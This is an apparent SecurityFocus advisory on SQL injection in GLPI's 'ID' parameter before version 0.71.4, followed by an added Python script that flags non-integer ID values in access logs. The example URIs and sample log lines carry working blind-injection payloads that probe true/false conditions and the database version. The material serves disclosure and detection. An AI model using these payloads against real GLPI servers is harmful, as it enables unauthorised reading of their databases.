GLPI Prior to 0.71.4 'ID' Parameter Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/glpi/front/user.form.php?ID=2+and+1=1 (True)
http://www.example.com/glpi/front/user.form.php?ID=2+and+1=1337 (False)
http://www.example.com/glpi/front/user.form.php?ID=2+and+substring(version(),1,1)=5
http://www.example.com/glpi/front/profile.form.php?ID=2+and+1=1337
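
A detection sketch for requests like those listed above, added here as an example and not part of the original advisory: it scans web-server access logs for GLPI front-end requests whose ID value is not a plain integer. The log lines are constructed samples; the Combined Log Format, the /front/ path filter and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /glpi/front/user.form.php?ID=2 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /glpi/front/user.form.php?ID=2+and+1=1 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2010:10:00:06 +0000] "GET /glpi/front/user.form.php?ID=2+and+1=1337 HTTP/1.1" 200 812
192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /glpi/front/profile.form.php?ID=2%20and%201=1337 HTTP/1.1" 200 790
192.0.2.10 - - [01/Jan/2010:10:01:00 +0000] "GET /glpi/front/central.php HTTP/1.1" 200 2048
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: the affected scripts are PHP pages under a /front/ directory.
FRONT_PAGE_RE = re.compile(r"/front/[\w.]+\.php$")
# A record identifier should be nothing but an (optionally negative) integer.
INTEGER_RE = re.compile(r"-?[0-9]+")


def suspicious_id_requests(log_text):
    """Return (client, path, decoded ID) for requests whose ID is not an integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not FRONT_PAGE_RE.search(url.path):
            continue
        # parse_qs splits each pair on the first '=' and decodes '+' and %XX,
        # so "ID=2+and+1=1" yields the value "2 and 1=1".
        for value in parse_qs(url.query).get("ID", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, url.path, value))
    return hits


if __name__ == "__main__":
    for client, path, value in suspicious_id_requests(SAMPLE_LOG):
        print(f"{client} {path} ID={value!r}")
```

The same integer-only test is what the server side should enforce on ID before the value reaches a query.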


 

Copyright 2010, SecurityFocus